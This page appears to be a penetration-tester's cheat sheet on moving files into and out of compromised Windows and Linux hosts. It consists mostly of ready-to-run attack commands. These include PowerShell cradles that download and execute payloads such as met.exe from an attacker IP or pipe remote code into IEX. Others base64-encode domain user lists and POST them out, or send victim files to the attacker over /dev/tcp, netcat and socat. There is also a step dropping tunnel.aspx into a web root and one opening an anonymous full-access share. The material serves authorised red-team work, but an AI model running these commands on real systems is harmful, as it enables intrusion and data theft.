File Transfer

Base64

String to base64 and POST with PowerShell:

PS > $str = cmd /c net user /domain
PS > $base64str = [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($str))
PS > IWR -Uri http://127.0.0.1/msg -Method POST -Body $base64str

File to base64 with certutil:

Cmd > certutil -encode <FILE_TO_ENCODE> C:\Windows\Temp\encoded.b64
Cmd > type C:\Windows\Temp\encoded.b64

Base64 file transfer from Linux to Windows:

$ base64 -w0 tunnel.aspx; echo
...BASE64_CONTENTS...
PS > Add-Content -Encoding UTF8 tunnel.b64 "<BASE64_CONTENTS>" -NoNewLine
PS > $data = Get-Content -Raw tunnel.b64
PS > [IO.File]::WriteAllBytes("C:\inetpub\wwwroot\uploads\tunnel.aspx", [Convert]::FromBase64String($data))

Print file by base64 chunks in console:

$ python -c "import base64;f=open('data.bin','rb');[print(base64.b64encode(c).decode()) for c in iter(lambda: f.read(4096), b'')]"

Hex

Compress a binary file and transfer it to Windows by copy-pasting commands into the console:

$ upx -9 file.exe
$ exe2hex -x file.exe -p file.cmd
$ cat file.cmd | xclip -i -sel c

PowerShell

PowerShell upload file:

PS > (New-Object Net.WebClient).UploadFile("http://10.10.13.37/file.txt", "file.txt")

PowerShell auto detect proxy, download file from remote HTTP server and run it:

$proxyAddr=(Get-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings").ProxyServer;$proxy=New-Object System.Net.WebProxy;$proxy.Address=$proxyAddr;$proxy.UseDefaultCredentials=$true;$client=New-Object System.Net.WebClient;$client.Proxy=$proxy;$client.DownloadFile("http://10.10.13.37/met.exe","$env:userprofile\music\met.exe");$exec=New-Object -com shell.application;$exec.shellexecute("$env:userprofile\music\met.exe")

PowerShell manually set proxy and upload file to remote HTTP server:

$client=New-Object System.Net.WebClient;$proxy=New-Object System.Net.WebProxy("http://proxy.megacorp.local:3128",$true);$creds=New-Object Net.NetworkCredential("snovvcrash","Passw0rd!","megacorp.local");$creds=$creds.GetCredential("http://proxy.megacorp.local","3128","KERBEROS");$proxy.Credentials=$creds;$client.Proxy=$proxy;$client.UploadFile("http://10.10.13.37/results.txt","results.txt")

Another proxy-aware download cradle:

New-PSDrive -Name HKU -PSProvider Registry -Root HKEY_USERS | Out-Null
$keys = Get-ChildItem "HKU:\" -ErrorAction SilentlyContinue
ForEach ($key in $keys) {if ($key.Name -like "*S-1-5-21-*") {$start=$key.Name.Substring(10);break}}
$proxyAddr=(Get-ItemProperty -Path "HKU:$start\Software\Microsoft\Windows\CurrentVersion\Internet Settings\").ProxyServer
[System.Net.WebRequest]::DefaultWebProxy = New-Object System.Net.WebProxy("http://$proxyAddr")
$wc = New-Object System.Net.WebClient
$wc.DownloadString("http://10.10.13.37/test.txt") | IEX
Remove-PSDrive -Name HKU -Force

Quicky connection tests for HTTP/HTTPS:

# HTTP
PS > IWR -UseBasicParsing -Uri http://www.msftconnecttest.com/connecttest.txt -UserAgent "Microsoft NCSI"
# HTTPS
PS > [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
PS > [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
PS > [System.Net.ServicePointManager]::Expect100Continue = {$false}
PS > (IWR -UseBasicParsing -Uri https://www.microsoft.com/en-us/microsoft-365 -UserAgent "Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like Gecko").RawContentLength

Through a negotiate proxy with creds (can also use proxy-negotiate):

$ KRB5CCNAME=user.ccache curl -v -sSL -k -A 'Microsoft NCSI' --proxy http://gate01.megacorp.local:8080 [--proxy-user 'megacorp.local\user:Passw0rd!'] [--proxy-ntlm] --proxy-negotiate http://www.msftncsi.com/ncsi.txt

/dev/tcp

Attacker is the sender:

# Sender:
root@kali:~$ tar -zcvf folder.tar.gz folder
root@kali:~$ nc -w3 -lvnp 1234 < folder.tar.gz
# Recipient:
www-data@victim:~$ bash -c 'cat < /dev/tcp/127.0.0.1/1234 > .folder.tar.gz'
www-data@victim:~$ tar -zxvf .folder.tar.gz

Victim is the sender:

# Recipient:
root@kali:~$ nc -w3 -lvnp 1234 > file.txt
# Sender:
www-data@victim:~$ bash -c 'cat < file.txt > /dev/tcp/127.0.0.1/1234'

socat

Recipient (Attacker):

$ socat TCP-LISTEN:1337 OPEN:data.tar,create,append

Sender (Victim):

$ tar cf - /dev/shm/data | socat TCP:10.10.13.37:1337 -

SSH

SSH + cat/type:

$ ssh [email protected] 'type "C:\Windows\Temp\data.bin"' | pv > /tmp/data.bin

SMB

smbserver.py

Start SMB server:

$ smbserver.py -smb2support share `pwd`

Mount SMB in Windows with net use:

$ smbserver.py -username snovvcrash -password 'Passw0rd!' -smb2support share `pwd`
Cmd > net use Z: \\10.10.13.37\share
Cmd > net use Z: \\10.10.13.37\share /u:snovvcrash 'Passw0rd!'

Mount SMB in Windows with New-PSDrive:

$ smbserver.py -username snovvcrash -password 'Passw0rd!' -smb2support share `pwd`
PS > $pass = 'Passw0rd!' | ConvertTo-SecureString -AsPlainText -Force
PS > $cred = New-Object System.Management.Automation.PSCredential('snovvcrash', $pass)
Or
PS > $cred = New-Object System.Management.Automation.PSCredential('snovvcrash', $(ConvertTo-SecureString 'Passw0rd!' -AsPlainText -Force))
PS > New-PSDrive -Name Z -Root \\10.10.13.37\share -Credential $cred -PSProvider FileSystem
PS > cd Z:

Cmd > net share pentest=c:\smb_pentest /GRANT:"Anonymous Logon,FULL" /GRANT:"Everyone,FULL"
Or
Cmd > net share pentest=c:\smb_pentest /GRANT:"Administrator,FULL"
Cmd > net share pentest /delete

FTP

$ python -m pip install pyftpdlib
$ python -m pyftpdlib -Dwp 2121
Cmd > cd C:\Windows\System32\spool\drivers\color
Cmd > echo 'open 127.0.0.1 2121' > ftp.txt
Cmd > echo 'user anonymous' >> ftp.txt
Cmd > echo 'anonymous' >> ftp.txt
Cmd > echo 'binary' >> ftp.txt
Cmd > echo 'put file.bin' >> ftp.txt
Cmd > echo 'bye' >> ftp.txt
Cmd > ftp -v -n -s:ftp.txt

TFTP

Send file.exe from Windows to Linux (TFTP client must be enabled on Windows):

$ sudo atftpd --daemon --bind 10.10.13.37 --port 69 ./tftp
Cmd > tftp -i 10.10.13.37 put file.exe
$ sudo pkill atftpd

ICMP

Exfiltration / Infiltration

Tools

http-server

https://github.com/http-party/http-server

$ sudo apt install npm -y
$ sudo npm install http-server -g
$ sudo http-server -d false -p 443 -S -C /etc/letsencrypt/live/example.com/cert.pem -K /etc/letsencrypt/live/example.com/privkey.pem --log-ip | tee http-server.log

goshs

https://github.com/patrickhener/goshs

$ eget -qs linux/amd64 "patrickhener/goshs" --to ~/tools/goshs
$ sudo ~/tools/goshs/goshs -ro -si -p 443 -s -sc /etc/letsencrypt/live/example.com/cert.pem -sk /etc/letsencrypt/live/example.com/privkey.pem -V | tee goshs.log

simplehttpserver

https://github.com/projectdiscovery/simplehttpserver

$ eget -qs linux/amd64 "projectdiscovery/simplehttpserver" --to ~/tools/pd
$ sudo ~/tools/pd/simplehttpserver -listen 10.10.13.37:1337 -path `pwd` -upload -https -cert /etc/letsencrypt/live/example.com/fullchain.pem -key /etc/letsencrypt/live/example.com/privkey.pem -domain example.com -basic-auth 'snovvcrash:Passw0rd!' -max-file-size 100

Last updated 4 months ago

hashtagBase64

hashtagHex

hashtagPowerShell

hashtag/dev/tcp

hashtagsocat

hashtagSSH

hashtagSMB

hashtagsmbserver.py

hashtagnet share

hashtagFTP

hashtagTFTP

hashtagICMP

hashtagExfiltration / Infiltration

hashtagTools

hashtaghttp-server

hashtaggoshs

hashtagsimplehttpserver